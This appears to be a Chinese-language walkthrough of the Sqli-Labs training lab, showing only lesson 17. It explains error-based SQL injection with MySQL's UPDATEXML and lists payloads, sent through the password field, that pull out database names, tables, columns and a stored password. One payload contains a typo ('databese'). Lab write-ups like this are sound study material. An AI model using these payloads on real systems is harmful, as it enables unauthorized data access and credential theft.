Sqli-Labs less17-19

less-17

前置基础知识：

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc

第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

第三个参数：new_value，String格式，替换查找到的符合条件的数据

作用：改变文档中符合条件的节点的值改变XML_document中符合XPATH_string的值

而我们的注入语句为： select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);

其中的concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出 ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'

参考链接：

https://www.jb51.net/article/125599.htm

https://www.jb51.net/article/125607.htm

首先，在php网页代码中插入输出sql语句和update语句，这样便于观察：

然后尝试输入发现，这个是一个更改password的功能，前提是username需要正确：

代码中使用了get_magic_quotes_gpc name和password分开验证，而且在验证的时候对于name进行了过滤处理，将’进行了转义，所以只能在password处注入

我们可以根据上面的updataxml构造注入语句：

查当前库：uname=admin&passwd=a' and updatexml(1,concat(0x7e,(databese())),1)#&submit=Submit

查库：uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1)#&submit=Submit

查表：uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)#&submit=Submit

查列：uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)#&submit=Submit

查信息：uname=admin&passwd=a' and updatexml(1,concat(0x7e,(select password from (select password from security.users limit 0,1)users ),0x7e),1)#&submit=Submit